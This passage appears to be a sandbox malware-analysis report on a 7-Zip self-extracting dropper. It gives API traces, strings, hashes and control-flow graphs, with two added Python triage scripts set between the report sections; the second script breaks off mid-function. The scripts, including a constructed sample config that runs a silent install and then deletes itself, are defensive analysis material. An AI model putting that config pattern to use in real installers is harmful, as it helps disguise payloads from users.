10815->10816 10817 40cdda ctype 3 API calls 10816->10817 10818 40fbac 10817->10818 10819 40cdda ctype 3 API calls 
10818->10819 10820 40fbb6 10819->10820 10821 40cdda ctype 3 API calls 10820->10821 10822 40fbbe 10821->10822 10823 40cdda ctype 3 API calls 10822->10823 10824 40fbcb 10823->10824 10825 40cdda ctype 3 API calls 10824->10825 10826 40fbd3 10825->10826 10827 40cdda ctype 3 API calls 10826->10827 10828 40fbe0 10827->10828 10829 40cdda ctype 3 API calls 10828->10829 10830 40fbe8 10829->10830 10831 40cdda ctype 3 API calls 10830->10831 10832 40fbf5 10831->10832 10833 40cdda ctype 3 API calls 10832->10833 10834 40fbfd 10833->10834 10989 40cdda ctype 3 API calls 10988->10989 10990 40fde7 10989->10990 11006 4012ec 11005->11006 11007 4012ff 11005->11007 11006->11007 11008 4012ee Sleep 11006->11008 11009 401338 11007->11009 11010 40132a EndDialog 11007->11010 11008->11006 11010->11009 11012 40240b 11011->11012 11012->10093 11013->10145 11015 40133e 2 API calls 11014->11015 11016 4029c5 11015->11016 11017 40133e 2 API calls 11016->11017 11018 4029d1 11017->11018 11018->10188 11020 402823 2 API calls 11019->11020 11021 402b2f 11020->11021 11022 402b6b 11021->11022 11025 4028a1 11021->11025 11022->10213 11026 4028b3 WideCharToMultiByte 11025->11026 11027 4028ad 11025->11027 11026->11022 11028 40250f 2 API calls 11027->11028 11028->11026 11030 407d72 11029->11030 11031 407d6d 11029->11031 11030->11031 11032 407ce8 22 API calls 11030->11032 11031->10243 11032->11031 11033->10243 11034->10249 11035->10251 11036->10253 11037->10257 11038->10259 11039->10263 11040->10267 11041->10271 11043 407c87 4 API calls 11042->11043 11044 407e42 11043->11044 11044->10281 11049 407e53 11045->11049 11048->10285 11050 407c87 4 API calls 11049->11050 11051 407e5b 11050->11051 11051->10282 11052->10293 11054 407c87 4 API calls 11053->11054 11055 407e8d 11054->11055 11055->10298 11056->10301 8704 40c9e5 ReadFile
                                                                    APIs
                                                                    • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734
                                                                      • Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
                                                                      • Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
                                                                      • Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
                                                                      • Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
                                                                      • Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
                                                                      • Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
                                                                      • Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83
                                                                    • GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
                                                                    • GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                                      • Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                                      • Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
                                                                      • Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434
                                                                    • _wtol.MSVCRT ref: 00405825
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
                                                                    • _wtol.MSVCRT ref: 00405A25
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
                                                                    • wsprintfW.USER32 ref: 00405D2A
                                                                      • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                      • Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                    • GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E
                                                                      • Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                      • Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                      • Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D
                                                                    • _wtol.MSVCRT ref: 00405F6B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
                                                                    • GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
                                                                    • SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
                                                                    • CoInitialize.OLE32(00000000), ref: 004062F2
                                                                    • _wtol.MSVCRT ref: 00406338
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
                                                                    • GetKeyState.USER32(00000010), ref: 004063BE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
                                                                    • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
                                                                    • _wtol.MSVCRT ref: 0040686C
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53
                                                                      • Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
                                                                      • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
                                                                      • Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77
                                                                      • Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                      • Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406BDE
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406BE4
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00406C1D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406C47
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0000000A), ref: 00406253
                                                                      • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407D48
                                                                      • Part of subcall function 00407CE8: ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00407D50
                                                                      • Part of subcall function 00407A5B: ??3@YAXPAX@Z.MSVCRT(?,00408571,00000002,00000000,00419810), ref: 00407A64
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D0B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D13
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,?), ref: 00406D2A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406D3E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406D46
                                                                    • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 00406D5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$_wtol$lstrlen$Message$??2@CommandCurrentFileLineModuleProcessTimer$?_set_new_handler@@AddressAttributesCallbackCreateDirectoryDispatchDispatcherHandleInitializeKillLibraryLoadNameProcSizeStateUserVersionWindowWorking_wcsnicmpmemsetwsprintf
                                                                    • String ID: " -$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxelevation$sfxversion$sfxwaitall$shc$waitall$x64$x86
                                                                    • API String ID: 1141480454-1804565692
                                                                    • Opcode ID: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                    • Instruction ID: 2089f84092e6f9dd7ccb59dec8b65dd0323b364c678a6dd427d939ae7de33dee
                                                                    • Opcode Fuzzy Hash: 61b6db2cf502f6cdb9ed3d8ef88f85430eec8f3b8d6da4354540e32e0b52767e
                                                                    • Instruction Fuzzy Hash: 0ED2B071900205AADF25BF61DC46AEE37A8EF50308F10803BF906B62D1DB7D9996CB5D
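The API trace and string table above belong to the 7-Zip SFX launcher in this sample: it reads a configuration block (keys such as RunProgram, ExecuteFile, ExecuteParameters, InstallPath, GUIMode, SelfDelete, Delete) and then launches whatever the block names, with extracted files placed under a 7ZipSfx.NNN temporary directory unless InstallPath overrides it. The script below is an added triage example, not code from the Joe Sandbox report or from 7-Zip: it locates the 7zSfx configuration block appended to a dropper, parses the key/value lines, reports where the embedded 7z archive starts, and lists what the stub would execute. The configuration markers and the 7z signature are the 7zSfx/7z formats as documented, but do not appear in the report; the sample SFX bytes (stub, the install path, the setup.exe switches) are constructed for the example.

```python
import re

# Markers of the 7zSfx configuration block, which the SFX module reads from
# between its own PE image and the appended 7z archive (7zSfx format; these
# marker strings are not listed in the report above).
CFG_BEGIN = b";!@Install@!UTF-8!"
CFG_END = b";!@InstallEnd@!"
SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"  # 6-byte signature that opens a 7z archive

KV_RE = re.compile(r'^\s*([A-Za-z0-9_]+)\s*=\s*"(.*)"\s*$')

# Config keys from the report's string table that decide what runs after extraction
LAUNCH_KEYS = ("RunProgram", "ExecuteFile", "ExecuteParameters", "SetEnvironment", "Shortcut")


def extract_sfx_config(data):
    """Return the config as {key: [values...]}, or None if no 7zSfx block is present."""
    start = data.find(CFG_BEGIN)
    if start < 0:
        return None
    end = data.find(CFG_END, start)
    if end < 0:
        return None
    body = data[start + len(CFG_BEGIN):end].decode("utf-8", errors="replace")
    cfg = {}
    for line in body.splitlines():
        m = KV_RE.match(line)
        if m:
            # a key may repeat (several RunProgram lines run in order), so keep a list
            cfg.setdefault(m.group(1), []).append(m.group(2))
    return cfg


def archive_offset(data):
    """Offset of the appended 7z archive (signature search), -1 if absent."""
    return data.find(SEVENZ_MAGIC)


def triage(data):
    """Summarise what the SFX would do: launched commands, install path, silence flags."""
    cfg = extract_sfx_config(data)
    findings = []
    if cfg is not None:
        for key in LAUNCH_KEYS:
            for value in cfg.get(key, []):
                findings.append(f"{key}={value}")
        if "InstallPath" in cfg:
            findings.append("InstallPath=" + cfg["InstallPath"][0])
        if cfg.get("GUIMode", ["0"])[0] != "0":
            findings.append("GUIMode=" + cfg["GUIMode"][0] + ": no user prompts during extraction")
        if cfg.get("SelfDelete", ["0"])[0] != "0":
            findings.append("SelfDelete: stub deletes itself after the payload runs")
        if cfg.get("Delete"):
            findings.append("Delete=" + ";".join(cfg["Delete"]))
    return {"config": cfg, "archive_offset": archive_offset(data), "findings": findings}


# Constructed sample (not from the analysed file): a fake stub, a config built
# from keys in the report's string table (hidcon:/nowait: are 7zSfx RunProgram
# prefixes; the path and switches are invented), and a minimal 7z header.
SAMPLE_STUB = b"MZ" + b"\x90" * 94
SAMPLE_CONFIG = (
    b';!@Install@!UTF-8!\r\n'
    b'GUIMode="2"\r\n'
    b'InstallPath="%ProgramFiles%\\Example"\r\n'
    b'RunProgram="hidcon:setup.exe /S"\r\n'
    b'RunProgram="nowait:setup.exe /run"\r\n'
    b'SelfDelete="1"\r\n'
    b';!@InstallEnd@!\r\n'
)
SAMPLE_SFX = SAMPLE_STUB + SAMPLE_CONFIG + SEVENZ_MAGIC + b"\x00\x04" + b"\x00" * 26

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_SFX
    result = triage(blob)
    print("7z archive at offset:", result["archive_offset"])
    for line in result["findings"]:
        print(" -", line)
```

Run it against a suspected SFX dropper (`python sfx_triage.py sample.exe`); the reported offset is where to carve the archive for extraction with 7z, and the findings list is what to compare against the process tree the sandbox recorded.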

                                                                    Control-flow Graph

                                                                    control_flow_graph 825 401815-401825 826 401831-40185c call 401132 call 41017a 825->826 827 401827-40182c 825->827 832 40185e 826->832 833 40186f-40187b call 401458 826->833 828 401b6f-401b72 827->828 835 401860-40186a call 40cb68 832->835 839 401b51-401b6c ??3@YAXPAX@Z call 40cb68 833->839 840 401881-401886 833->840 841 401b6e 835->841 839->841 840->839 842 40188c-4018c2 call 401370 call 401551 call 4013a9 ??3@YAXPAX@Z 840->842 841->828 852 401b37-401b3a 842->852 853 4018c8-4018e7 842->853 854 401b3c-401b4f ??3@YAXPAX@Z call 40cb68 852->854 858 401902-401906 853->858 859 4018e9-4018fd call 40cb68 ??3@YAXPAX@Z 853->859 854->841 861 401908-40190b 858->861 862 40190d-401912 858->862 859->835 864 40193a-401951 861->864 865 401934-401937 862->865 866 401914 862->866 864->859 869 401953-401976 864->869 865->864 867 401916-40191c 866->867 871 40191e-40192f call 40cb68 ??3@YAXPAX@Z 867->871 874 401991-401997 869->874 875 401978-40198c call 40cb68 ??3@YAXPAX@Z 869->875 871->835 878 4019b3-4019c5 GetLocalTime SystemTimeToFileTime 874->878 879 401999-40199c 874->879 875->835 883 4019cb-4019ce 878->883 881 4019a5-4019b1 879->881 882 40199e-4019a0 879->882 881->883 882->867 884 4019d0-4019da call 4036f1 883->884 885 4019e7-4019ee call 403387 883->885 884->871 892 4019e0-4019e2 884->892 888 4019f3-4019f8 885->888 890 401b23-401b32 GetLastError 888->890 891 4019fe-401a01 888->891 890->852 893 401a07-401a11 ??2@YAPAXI@Z 891->893 894 401b19-401b1c 891->894 892->867 895 401a22 893->895 896 401a13-401a20 893->896 894->890 898 401a24-401a48 call 40ef4a call 40ca5c 895->898 896->898 903 401afe-401b17 call 40f707 call 40cb68 898->903 904 401a4e-401a6c GetLastError call 40133e call 4030c7 898->904 903->854 913 401aa9-401abe call 4036f1 904->913 914 401a6e-401a75 904->914 920 401ac0-401ac8 913->920 921 401aca-401ae2 call 40ca5c 913->921 916 401a79-401a89 ??3@YAXPAX@Z 914->916 918 401a91-401aa4 call 40cb68 ??3@YAXPAX@Z 
916->918 919 401a8b-401a8d 916->919 918->835 919->918 920->916 927 401ae4-401af3 GetLastError 921->927 928 401af5-401afd ??3@YAXPAX@Z 921->928 927->916 928->903
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                    • Instruction ID: a60b5a69a01ec9efe61fd2c0eaeb1ac451c96722a8658d603a3df3c815bca288
                                                                    • Opcode Fuzzy Hash: 2eb857db419b6fef2d9b531affdfec99765c4fe0b30ebfa56ff95b369c608ec5
                                                                    • Instruction Fuzzy Hash: 81B18D71900209EFCB15EFA5D8819EEB7B5FF44314B10842BF412BB2E1DB39A946CB58

                                                                    Control-flow Graph

                                                                    control_flow_graph 1150 40236f-40238e LoadLibraryA GetProcAddress 1151 402390-40239b GetNativeSystemInfo 1150->1151 1152 40239c-40239f 1150->1152
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                    • String ID: GetNativeSystemInfo$kernel32
                                                                    • API String ID: 2103483237-3846845290
                                                                    • Opcode ID: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                    • Instruction ID: a8ef7632441d972feee251461dd82ff97bfeab42fd74a07c16b34688063011c9
                                                                    • Opcode Fuzzy Hash: a94058319a2387ce573cbdccf1dcafea5043f54207b6f02b0e86712a059d6701
                                                                    • Instruction Fuzzy Hash: 8FD05E70B00A08B6CB11ABB56D0ABDB32F959886487540461A802F00C0EAFCDD80C368

                                                                    Control-flow Graph

                                                                    control_flow_graph 1361 403387-40339e GetFileAttributesW 1362 4033a0-4033a2 1361->1362 1363 4033a4-4033a6 1361->1363 1364 4033fd-4033ff 1362->1364 1365 4033b5-4033bc 1363->1365 1366 4033a8-4033b3 SetLastError 1363->1366 1367 4033c7-4033ca 1365->1367 1368 4033be-4033c5 call 40335a 1365->1368 1366->1364 1369 4033fa-4033fc 1367->1369 1370 4033cc-4033dd FindFirstFileW 1367->1370 1368->1364 1369->1364 1370->1368 1372 4033df-4033f8 FindClose CompareFileTime 1370->1372 1372->1368 1372->1369
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403395
                                                                    • SetLastError.KERNEL32(00000010), ref: 004033AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 1799206407-0
                                                                    • Opcode ID: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                    • Instruction ID: bf2ef4a5338da23da25cb7262d028f8c999e3ef8181ecb362b3a9c4d4c50f47e
                                                                    • Opcode Fuzzy Hash: 9fcf262d0011693808f1a8ae36353e57a3cd3c7d334706e154b09c6bb7c8a146
                                                                    • Instruction Fuzzy Hash: 2F01A231510914ABDB111F789C8D6DA3B5CAF4132AF504632FD26F11E0DB38DB069A5D
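The control_flow_graph lines in this report are a flat token stream: each basic block is a node id followed by its address range and any API names or `call <addr>` targets on the block, and each `a->b` token is an edge. The parser below is an added example, not code from the report or from Joe Sandbox: it rebuilds blocks and edges from that stream, checks which blocks are reachable from the entry, and answers which APIs can execute on a path to a given block (here: what precedes CompareFileTime in the GetFileAttributesW function above, copied verbatim as the sample). The second, two-block input is constructed to exercise the one ambiguity in the format, a `call` target whose hex digits look like a decimal node id.

```python
import re
from collections import deque
from dataclasses import dataclass, field

# Token grammar of the "control_flow_graph" dumps in this report:
#   <id> <start>[-<end>] [ApiName ...] [call <hex> ...]   defines one basic block
#   <src>-><dst>                                            defines one edge
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-fA-F]+(?:-[0-9a-fA-F]+)?$")


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    apis: list = field(default_factory=list)   # imported API names on the block
    calls: list = field(default_factory=list)  # "call <addr>" targets inside the image


@dataclass
class Cfg:
    blocks: dict  # node_id -> Block, in definition order (entry block first)
    edges: list   # (src_id, dst_id)

    @property
    def entry(self):
        return next(iter(self.blocks))

    def adjacency(self, reverse=False):
        adj = {nid: [] for nid in self.blocks}
        for s, d in self.edges:
            if reverse:
                s, d = d, s
            adj.setdefault(s, []).append(d)
        return adj


def parse_cfg(text):
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok == "call" and cur is not None and i + 1 < len(toks):
            # "call 401132": the hex target can look like a decimal node id,
            # so it is consumed here before the node-id test below
            cur.calls.append(int(toks[i + 1], 16))
            i += 2
        elif NODE_ID_RE.match(tok) and i + 1 < len(toks) and ADDR_RE.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")
            cur = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            blocks[cur.node_id] = cur
            i += 2
        else:
            if cur is not None:
                cur.apis.append(tok)  # API name (or stray annotation) on the current block
            i += 1
    return Cfg(blocks, edges)


def _walk(start, adj):
    seen, queue = {start}, deque([start])
    while queue:
        n = queue.popleft()
        for m in adj.get(n, []):
            if m not in seen:
                seen.add(m)
                queue.append(m)
    return seen


def reachable(cfg):
    """Block ids reachable from the entry; anything else is dead or a parse gap."""
    return _walk(cfg.entry, cfg.adjacency())


def blocks_calling(cfg, api):
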